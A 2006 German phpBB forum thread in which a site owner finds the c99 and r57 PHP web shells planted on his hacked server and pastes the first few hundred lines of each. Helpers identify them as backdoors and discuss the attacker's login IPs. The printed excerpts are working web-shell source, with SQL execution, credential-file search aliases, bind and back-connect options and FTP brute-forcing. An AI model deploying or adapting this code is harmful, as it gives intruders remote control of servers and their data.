Es geht noch mal um Hacker!
Es geht noch mal um Hacker!
Ich habe gearde was festgestellt!
Ich hab doch vor kurzen einen neuanfang mit dem phpbb dimension gemacht!
Das alte Forum phpbb2 Plus war noch drauf!
Ich habe vorhin mir die Sachen aus dem media Ordner auf den Rechner gezogen! Da waren Dateien dabei die gar nicht dahingehören!
Und die Zone Alarm Security Suit sagte mir das die eine Datei irgend was mit Shell hat!
Zum einen ist dort eine phpundeine html datei!
Kann ich mir die mal so auf dem Rechner anschauen? Soll ich die vom Server löschen?
Auf dem FTP sind sogar drei c99.php, r57.phpund eineindex.html
Ich hab doch vor kurzen einen neuanfang mit dem phpbb dimension gemacht!
Das alte Forum phpbb2 Plus war noch drauf!
Ich habe vorhin mir die Sachen aus dem media Ordner auf den Rechner gezogen! Da waren Dateien dabei die gar nicht dahingehören!
Und die Zone Alarm Security Suit sagte mir das die eine Datei irgend was mit Shell hat!
Zum einen ist dort eine phpundeine html datei!
Kann ich mir die mal so auf dem Rechner anschauen? Soll ich die vom Server löschen?
Auf dem FTP sind sogar drei c99.php, r57.phpund eineindex.html
Zuletzt geändert von Snoopy am So 08.Okt, 2006 02:07, insgesamt 1-mal geändert.
- oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Wenn, dann must Du schon die vollständige Fehlermeldung von Zone Alarm posten (ggf.Screenshot), sonst ist das ein Rätzelraten, was die will.
Und was ist den in den rätzenhaften Dateien enthalten?
Und was ist den in den rätzenhaften Dateien enthalten?
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Hab 2 Bilder rangehängt!
Einmal, das was bei dem Virusscann rausgekommen ist und dann ein Bild von der html Seite
Auschnitt aus der r57.php (die ersten 250 Zeilen):
Auschnitt aus der c99.php (die ersten 240 Zeilen):
Einmal, das was bei dem Virusscann rausgekommen ist und dann ein Bild von der html Seite
Auschnitt aus der r57.php (die ersten 250 Zeilen):
Code: Alles auswählen
<?php
/******************************************************************************************************/
/* ## ##
/* ## ##
/* #######
/* ## ##
/* ## ##
/*
/*
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер
/* Версия: 1.23
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/******************************************************************************************************/
/* ~~~ Настройки ~~~ */
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.23tr
[KeyCoder]";
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}
/* ~~~ Аутентификация ~~~ */
// $auth = 1; - Аутентификация включена
// $auth = 0; - Аутентификация выключена
$auth = 0;
// Логин и пароль для доступа к скрипту
// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
$name='Root'; // логин пользователя
$pass='pass'; // пароль пользователя
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
{
header('WWW-Authenticate: Basic realm="shell"');
header('HTTP/1.0 401 Unauthorized');
exit(" : Access Denied</b>");
}
}
$head = '<!-- Здравствуй Вася -->
<html>
<head>
<title>shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
BACKGROUND-COLOR: #D4D0C8;
}
.td1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
}
table {
BORDER-RIGHT: #eeeeee 1px outset;
BORDER-TOP: #eeeeee 1px outset;
BORDER-LEFT: #eeeeee 1px outset;
BORDER-BOTTOM: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #D4D0C8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>';
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die(); }
if ($_POST['cmd']=="db_query")
{
echo $head;
switch($_POST['db'])
{
case 'MySQL':
if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
$db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
if($db)
{
if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
$querys = @explode(';',$_POST['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
$res = @mysql_query($query,$db);
$error = @mysql_error($db);
if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@mysql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @mysql_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
}
@mysql_free_result($res);
}
}
@mysql_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>MsSQL Server ile baglanti kurulamadi</b></font></div>";
break;
case 'MSSQL':
if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
$db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
if($db)
{
if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
$querys = @explode(';',$_POST['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
$res = @mssql_query($query,$db);
if (@mssql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @mssql_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
/* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
@mssql_free_result($res);
}
}
@mssql_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>MSSQL server ile baglanti Kurulamadi</b></font></div>";
break;
case 'PostgreSQL':
if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
$str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
$db = @pg_connect($str);
if($db)
{
$querys = @explode(';',$_POST['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
$res = @pg_query($db,$query);
$error = @pg_errormessage($db);
if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@pg_num_rows($res) > 0)
Auschnitt aus der c99.php (die ersten 240 Zeilen):
Code: Alles auswählen
<?php
/*
******************************************************************************************************
*
* c99shell.php v.1.0 beta (îò 21.05.2005)
* Freeware license.
* © CCTeaM.
* c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ âçëîìà.
* Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
http://ccteam.ru/releases/c99shell
*
* WEB: http://ccteam.ru
* ICQ UIN #: 656555
*
* Îñîáåííîñòè:
* + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba *) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
* çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
* (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar *)
* ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè (âûêë./âêë. ïàðàìåòðîì $filestealth)
* + ïðîäâèíóòûé SQL-ìåíåäæåð íå óñòóïàþùèé phpmyadmin,
ïðîñìîòð/ñîçäàíèå/ðåäàêòèðîâàíèå ÁÄ/òàáëèö, ïðîñìîòð ôàéëîâ ÷åðåç áðåøü â mysql
* + óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû.
* + óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå shell-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ðåäàêòèðîâàòü)
* + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
* + êîäèðîâùèê äàííûõ ÷åðåç md5, unix-md5, sha1, crc32, base64
* + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
* + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
* ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÁÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
* + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
* + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
* èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
* + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
* + àâòîìàòèçèðîâàíàÿ îòïðàâêà ñîîáùåíèé î íåäîðàáîòêàõ è ïîæåëàíèé àâòîðó (÷åðåç mail())
* * - óñïåõ ïîëíîñòüþ çàâèñèò îò êîíôèãóðàöèè PHP
*
*  îáùåì íóæíî óâèäåòü âñ¸ ýòî!
*
* Îæèäàåìûå èçìåíåíèÿ:
* ~ Ðàçâèòèå sql-ìåíåäæåðà
* ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ
*
* ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
â ICQ UIN #656555 ëèáî ÷åðåç ðàçäåë "feedback", áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
*
* Last modify: 21.05.2005
*
* © Captain Crunch Security TeaM. Coded by tristram
*
******************************************************************************************************
*/
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 beta (21.05.2005)"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 60; //limit of execution this script (seconds), 0 = unlimited.
//Authentication
$login = "c99"; //login
//DON'T FORGOT ABOUT CHANGE PASSWORD!!!
$pass = "c99"; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
/*COMMENT IT FOR TURN ON AUTHENTIFICATION >>>*/ $login = false; //turn off authentification
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
$autoupdate = false; //Automatic updating?
$updatenow = false; //If true, update now
$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
$filestealth = false; //if true, don't change modify&access-time
$donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start directory
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Directory for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = true; //If true then save sorting-type.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." %f%"=>array("php","php3","php4"),
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if true and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
// Set as false or for turn off.
$hexdump_lines = 8; // lines in hex preview file
$hexdump_rows = 24; // 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c99"; // default password for binding
$bindport_port = "11457"; // default port for binding
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable directories and files", "find / -perm -2 -ls"),
array("find all writable directories and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}
$sess_cookie = "c99shvars"; // Cookie-variable name
$usefsbuff = true; //Buffer-function
$copy_unset = false; //Remove copied files from buffer after pasting
//Quick launch
$quicklaunch = array(
array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
array("<b>Bind</b>",$surl."act=bind&d=%d"),
array("<b>Proc.</b>",$surl."act=ps_aux&d=%d"),
array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
array("<b>Sec.</b>",$surl."act=security&d=%d"),
array("<b>SQL</b>",$surl."act=sql&d=%d"),
array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
array("<b>Self remove</b>",$surl."act=selfremove"),
array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
);
//Highlight-code colors
$highlight_background = "#c0c0c0";
- Dungeonwatcher
- Beiträge: 1055
- Registriert: Sa 19.Feb, 2005 01:16
- Wohnort: Berlin
- Kontaktdaten:
Re: Es geht noch mal um Hacker!
Moin, moin!
[quote="Snoopy";p="64798"]Auf dem FTP sind sogar drei c99.php, r57.php und eineindex.html[/quote]
Lies hier mal
--> http://www.joomlaportal.de/sicherheit/5 ... tacke.html
--> http://www.phpbb2.de/fpost206689.html
--> http://forum.joomla.org/index.php/topic,78268.0.html
--> PHP.Backdoor.Trojan
Bye/2
[quote="Snoopy";p="64798"]Auf dem FTP sind sogar drei c99.php, r57.php und eineindex.html[/quote]
Lies hier mal
--> http://www.joomlaportal.de/sicherheit/5 ... tacke.html
--> http://www.phpbb2.de/fpost206689.html
--> http://forum.joomla.org/index.php/topic,78268.0.html
--> PHP.Backdoor.Trojan
Bye/2
Hab die Dateien gelöscht!
Mit den englsichen Seiten kann ich leider nichts anfangen, aber trotzdem danke!
EDIT:
Die Loginsicherheit des CTs hat mir etwas angezeigt:
7 Sat 07 Oct, 2006 23:55 81.14.200.67 (meine eigentliche IP)
8 Sat 07 Oct, 2006 23:50 85.97.153.156
9 Sat 07 Oct, 2006 23:50 85.97.153.156
Die anderen, hab ich rausgefunden, das sie aus Kayseri stammen. Ich glaube das liegt in der Türkei, denn in der nähe liegt Istanbul!
Ich hab das Passwort für mein Forum auch geändert. Hat das was zu bedeuten, oder nicht?
Mit den englsichen Seiten kann ich leider nichts anfangen, aber trotzdem danke!
EDIT:
Die Loginsicherheit des CTs hat mir etwas angezeigt:
7 Sat 07 Oct, 2006 23:55 81.14.200.67 (meine eigentliche IP)
8 Sat 07 Oct, 2006 23:50 85.97.153.156
9 Sat 07 Oct, 2006 23:50 85.97.153.156
Die anderen, hab ich rausgefunden, das sie aus Kayseri stammen. Ich glaube das liegt in der Türkei, denn in der nähe liegt Istanbul!
Ich hab das Passwort für mein Forum auch geändert. Hat das was zu bedeuten, oder nicht?
Zuletzt geändert von Snoopy am So 08.Okt, 2006 15:01, insgesamt 1-mal geändert.
- oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
IP's werden immer dynamisch vergeben.
Jedes Mal, wenn Du Dich am Internet anmeldest, vergibt der ISP (also Dein Internet Provider) eine gerade freie IP in seinem verfügbaren Bereich.
In der Regel erhälst Du, sofern Du regelmässig im Internet unterwegs bist, die gleiche IP, es kann aber auch jederzeit vorkommen, daß sich Deine IP ändert.
Dann wird die vorherige IP irgend einem anderen Kunden zugeteilt.
Und wenn der eben in der Türkei sitzt, dann ist das nunmal so.
Allerdings, und das liegt hier näher:
Dein Board wurde von türkischen Hackern auseinander genommen.
Ich vermute hier dann eher, daß diese(r) Hacker Deinen Account verwendete, um das Board zu hacken und zu verändern, er meldete sich also mit Deinen Daten am Board an, daher dann auch die IP's auf der Türkei im CT-Log.
Da diese IP's nun in der Türkei liegen, würdest Du wohl kaum eine Chance haben, diese für eine Anzeige verwenden zu können. Leider.
Daher würde ich die IP's mal auf jeden Fall im CT sperren, damit dieser erst garnicht mehr dem Board nahe kommen kann, ohne, daß der CT den Zugang sofort sperrt und eine Meldung auswirft.
Allerdings dann auch nur auf dem Board, den Server kann der CT so nicht sichern.
Nun, Cback hat einen Standalone-CT entwickelt, aber dafür würdest Du Root-Rechte auf dem Server benötigen, welche Du ja nicht hast...
Jedes Mal, wenn Du Dich am Internet anmeldest, vergibt der ISP (also Dein Internet Provider) eine gerade freie IP in seinem verfügbaren Bereich.
In der Regel erhälst Du, sofern Du regelmässig im Internet unterwegs bist, die gleiche IP, es kann aber auch jederzeit vorkommen, daß sich Deine IP ändert.
Dann wird die vorherige IP irgend einem anderen Kunden zugeteilt.
Und wenn der eben in der Türkei sitzt, dann ist das nunmal so.
Allerdings, und das liegt hier näher:
Dein Board wurde von türkischen Hackern auseinander genommen.
Ich vermute hier dann eher, daß diese(r) Hacker Deinen Account verwendete, um das Board zu hacken und zu verändern, er meldete sich also mit Deinen Daten am Board an, daher dann auch die IP's auf der Türkei im CT-Log.
Da diese IP's nun in der Türkei liegen, würdest Du wohl kaum eine Chance haben, diese für eine Anzeige verwenden zu können. Leider.
Daher würde ich die IP's mal auf jeden Fall im CT sperren, damit dieser erst garnicht mehr dem Board nahe kommen kann, ohne, daß der CT den Zugang sofort sperrt und eine Meldung auswirft.
Allerdings dann auch nur auf dem Board, den Server kann der CT so nicht sichern.
Nun, Cback hat einen Standalone-CT entwickelt, aber dafür würdest Du Root-Rechte auf dem Server benötigen, welche Du ja nicht hast...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
http://www.zone-h.org/index2.php?option ... id=4891368
Hab ich gerade gefunden! Hab bei Google ma Snoopytraum eingegeben und bin auf diese Seite gestoßen http://www.zone-h.org
Nach einigen stöbern hab ich den ersten Link gefunden!
Was hat diese Seite zu bedeuten?
Wenn mann mal schaut was heute schon so alles gehackt worden ist, wahnsinn!
Hab ich gerade gefunden! Hab bei Google ma Snoopytraum eingegeben und bin auf diese Seite gestoßen http://www.zone-h.org
Nach einigen stöbern hab ich den ersten Link gefunden!
Was hat diese Seite zu bedeuten?
Wenn mann mal schaut was heute schon so alles gehackt worden ist, wahnsinn!
- Dungeonwatcher
- Beiträge: 1055
- Registriert: Sa 19.Feb, 2005 01:16
- Wohnort: Berlin
- Kontaktdaten:
'n Abend!
[quote="Snoopy";p="65030"]Wenn mann mal schaut was heute schon so alles gehackt worden ist, wahnsinn![/quote]
Tja, zumindest ist mein benutztes BS nicht darunter. Ich bleibe also bei Diesem und dem unbekannten Webserver.
Bye/2
[quote="Snoopy";p="65030"]Wenn mann mal schaut was heute schon so alles gehackt worden ist, wahnsinn![/quote]
Tja, zumindest ist mein benutztes BS nicht darunter. Ich bleibe also bei Diesem und dem unbekannten Webserver.
Bye/2
Zuletzt geändert von Dungeonwatcher am Do 12.Okt, 2006 23:20, insgesamt 2-mal geändert.
BS? Was ist das?
Nach den Angaben von dem ersten Link, ist der dann über den Anbieter rein?
Nach den Angaben von dem ersten Link, ist der dann über den Anbieter rein?
